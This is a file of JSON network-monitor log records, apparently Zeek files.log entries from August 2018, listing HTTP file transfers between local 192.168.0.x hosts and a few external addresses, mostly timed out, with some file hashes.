+{"ts":"2018-08-03T23:37:54.472078Z","fuid":"FXKMlz3hxRsloyhHJ7","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C62aJJ154IjqMGSera"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.472078Z","fuid":"FOcQuJG2lEALFv5fa","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CK7Oep49hblM0uNSWl"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":10220,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.472078Z","fuid":"FEa4Eb4oY3ewAzzuJg","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C8OCcF39cK7IXWGtog"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.482179Z","fuid":"FgBCo04zS0lxQZr9Y","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CzHcff1PtCO9dszXG8"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":7300,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.482179Z","fuid":"FgKg1OGKbnPNnOa42","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CMr5Pu4HyCj6e9CU6h"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.482179Z","fuid":"FBNSHp2QCjf9RS3PHb","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CE7KmD16NVsk9Lmpre"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.507496Z","fuid":"FFaIe838jM7jzMwI7l","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CeNXlh3uEgnQdGiXJ6"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.522677Z","fuid":"FdKpmC3hDFxAsGp4ek","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cid3cU296pg1n2yuBf"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.522677Z","fuid":"FXCx4A3OwuCICeFIof","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CAx9Qn3mUQ9SOrMi2i"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.522677Z","fuid":"Fa6Jap4viyMrJBLzij","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CLQkcH1QeDEeuK9Am3"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.537858Z","fuid":"FWrrpk1JyABqqsgiV3","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C1eoSc14dH8hNOsSSb"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"mime_type":"application/xml","duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":142,"missing_bytes":0,"overflow_bytes":0,"timedout":true,"md5":"4fb0bf8120c59ca7dd7d3ab7216ebd59","sha1":"6a428c5cac15a8b52c554860cc0e99f53fe644c6","sha256":"e2b819934515cd748db9825f60b32e8be198d5c98b731f592646b7c6bc26eec8"} +{"ts":"2018-08-03T23:37:53.664323Z","fuid":"FLUOAm3fcoRU7c1h72","tx_hosts":["108.161.188.226"],"rx_hosts":["192.168.0.51"],"conn_uids":["CsRmsA1ga6TquOK8xl"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":21000,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.427233Z","fuid":"F9RYUKAvVNkuGFeh","tx_hosts":["91.121.219.90"],"rx_hosts":["192.168.0.51"],"conn_uids":["CA9ROc1BC66bVmw7Qh"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":4164,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.452546Z","fuid":"FmdchXrP4EA4CV0y5","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C7dm603OQwlaOERbf8"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.472675Z","fuid":"FRhDvu4SreQ81rQr9h","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CKT8c13LWhFwZyFvY9"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.497975Z","fuid":"FucNfr7iE9OMVLH9d","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CrGW4sbmtN4ZYSBX9"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.497975Z","fuid":"F0NEsF4eBIopgEIQWl","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CAdIZzaMLrwTOmr2f"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.513208Z","fuid":"F7vQzG4HHPCC5H7kCj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CAsXWC4zM3TEY1hwa"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.523290Z","fuid":"FzGmTt3CyBeJB14tud","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C2mWW2nzorkGrsd8l"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.523290Z","fuid":"F7RcKo1OQURuGkrSe8","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CUQQ582SPFDOZUQGk9"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.538459Z","fuid":"FTllgh1eTFGgvFb9Ze","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CJ7RuI2tVGibe7Jvod"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.116406Z","fuid":"FHxo082iwQQZYZFen","tx_hosts":["104.28.4.112"],"rx_hosts":["192.168.0.51"],"conn_uids":["CQIZ983c7nMonpTb1e"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1400,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.177386Z","fuid":"FbLFAv4opfnYwLd2U9","tx_hosts":["190.93.246.58"],"rx_hosts":["192.168.0.51"],"conn_uids":["CAGNLC4BeEqgAEK8o2"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":9800,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.450183Z","fuid":"FwUbft2YasV8Vmm4dh","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CWKpsX2rT2eUh5iwzf"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.465396Z","fuid":"FfXw0T0Rd5DtqCfs2","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CsXFLzHcf1FqHkY4"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.465396Z","fuid":"FBivRH2Ze3QtEfOU32","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C6JWv3tQKRCqlK8ui"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.480536Z","fuid":"FIZzyHyiPhhg64el","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CRmlgl1dJqa5ayqKj2"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.490674Z","fuid":"Fyi0EJ2Gk6opyaBXEd","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CsIymd3faLLs1bIYve"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.510898Z","fuid":"FPFMdMXwHz3GmLdFe","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CkvCz93XdvoTFvXAPh"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.526092Z","fuid":"FR66Yaa75AtXCvoS6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CKiNcr4p3dnCSxbvla"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.460802Z","fuid":"FXolz82KX7HVGaUdq7","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CtlKpp2dtVW9XhbZ2l"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":10220,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.496175Z","fuid":"FxuZ7M1rF6PW4Ar2Q3","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CDxwni1tPhXpkfMAq3"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.516380Z","fuid":"F6hn2Ch4S5bFZ6yC3","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cf7i6tem7WLn68875"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.526532Z","fuid":"FsGx5U13YJLXUIiyGe","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C3Ntf919qtrqCyRmt4"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":16060,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.526532Z","fuid":"FKewjMoulmOaznnBi","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C21VmN3StYrHql2wk5"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.617604Z","fuid":"FvFdV621Wqu6OoWF1k","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.112"],"conn_uids":["C7RFnEJKUuCOAUxGh"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"mime_type":"text/html","duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":2237,"total_bytes":5426,"missing_bytes":0,"overflow_bytes":0,"timedout":true,"md5":"62eb7e4646913ceb050882f01a3ec87b","sha1":"537d6c51da5ad2c5624ce72b051736e9c381d61b","sha256":"ad7b43c6215f16da8ead436a01e81a858ce33c31753e76ece22275e0e6b54668"} +{"ts":"2018-08-03T23:37:54.642929Z","fuid":"FQOx9d3wKsrQxupMRg","tx_hosts":["216.58.209.102"],"rx_hosts":["192.168.0.51"],"conn_uids":["CKAYaS3grg8hoT6Yc5"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":30536,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.209166Z","fuid":"FrrNRH7dqaeX8C7cf","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.54"],"conn_uids":["CznwQy2DWQbI8uEFl4"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.454031Z","fuid":"F2HlR82at5zupsFTK1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CvQRod4TF4qYwUFyl8"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.469219Z","fuid":"Fgwdhw4ycoDAQYTHV6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C1W8KO19VNu32KkUFd"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.469219Z","fuid":"FFXyp81G299VoSlYC9","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CtUz0v1A4dMd2FZ6m2"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.484406Z","fuid":"FdiQul1hBMmnSgr8Ml","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["COAgrd1vKfmqJccx0d"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.494470Z","fuid":"F7FFoU2vaPaqOmM1xe","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CFT1c646Xa4IQAvfe6"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.494470Z","fuid":"FqaXF72YnH2Y5BCxBj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C14UlW3yuQOmVSoNcl"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.494470Z","fuid":"FxDvCq3fu777xjMD7b","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CrC3tm3WzUZPQF2Pie"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.565405Z","fuid":"Ff8sie9HnrBA3mGQk","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C8yZvrdsjR2vK56Ue"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":28079,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.466112Z","fuid":"FwhjZ817XrCldtjSl8","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CYsXin2UvxfNvCCVxh"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.466112Z","fuid":"F91PAAYPcMELsARF1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C2U72A3GjgAvLruQlk"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":7300,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.481299Z","fuid":"F1IREGntbKuYtKmhc","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CPajIF0NWkOTHaA0b"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.481299Z","fuid":"FlhOjPw4iRpjYPPpk","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Ck289t30iVweQXPuzi"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.496490Z","fuid":"FGvl6M1b7gC3bXfFp1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["COslyS3IGVtmLurbo6"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.496490Z","fuid":"FJZo4I3lOtQJdhk6ug","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CPhPt42oUjVXOKi8O1"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.496490Z","fuid":"FTYwap15Vo9XTbBlxl","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CoB89w29Z62ZNaTdg9"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":5840,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.516699Z","fuid":"FnGZqX2ayy38RtNIRj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C56kpk4pOnlXnERDYi"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.618033Z","fuid":"FyNNnG1XSPg72ENczc","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.112"],"conn_uids":["CNsMn9250ZwQxjnV7h"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"mime_type":"text/html","duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":2507,"missing_bytes":0,"overflow_bytes":0,"timedout":true,"md5":"4d6e4561949532d49f11a8aa61edf994","sha1":"b939c580a28578712a06abc3216d138c29e9c08b","sha256":"212d199a3dc605a5ca13c3f626b76bc4a37cbad1f349867bfac41c4ded119c91"} +{"ts":"2018-08-03T23:37:54.673650Z","fuid":"FBjrF1t2dJj9WDNfl","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.112"],"conn_uids":["C7jUaG3mfdKXn9NwJ9"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.164154Z","fuid":"FyFY6i1PmWCIXMaZBf","tx_hosts":["213.155.151.149"],"rx_hosts":["192.168.0.51"],"conn_uids":["CS5h4d1yK3SL2BAMnb"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":443,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.467446Z","fuid":"FOEHU93009DCYcHWC9","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CEnkWE3kMbE6RKm8il"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.467446Z","fuid":"F12l912q1xOKUfgkh8","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CjpZVOzaoS1HkhyOh"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.477557Z","fuid":"FZYg0abAli3Zb7hO4","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CNG5q93d7bpwtPSpAd"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.512975Z","fuid":"F4179M1KTm2izonLm3","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CCXSna2n8JCHpdFlj4"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.512975Z","fuid":"FkICKu2RRclPtSOVqk","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CaU6J32XIrVYcuDc79"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":16060,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.512975Z","fuid":"F633Ox1hAdwbzTDqUk","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CiIGavOCnKXlF19Dj"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.512975Z","fuid":"FVBGmu1tck04Gcwwk1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cl1t9B4C1YEq3DFcQj"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.512975Z","fuid":"F2pvSqSnKuVb0j28l","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cml2jj2tN6CVQSBiad"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.512975Z","fuid":"FYoHvn3LmpnpyWNMDe","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CQQ32m1jKwrA12XRk3"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":5840,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.533213Z","fuid":"Fp7GoT2nx2K37kp0rj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CCb4hEmnJd230WJwi"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":16060,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.533213Z","fuid":"F8w4zR1T7Upqv03tUj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CrfutrrKfH3dKlEB"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.485222Z","fuid":"FaaIZy37zot6crEp8l","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CSoTWBdOH6ixECqSi"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.500388Z","fuid":"F5X5Jg33xBhdArESkg","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CtQfUs32B283oI6067"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} 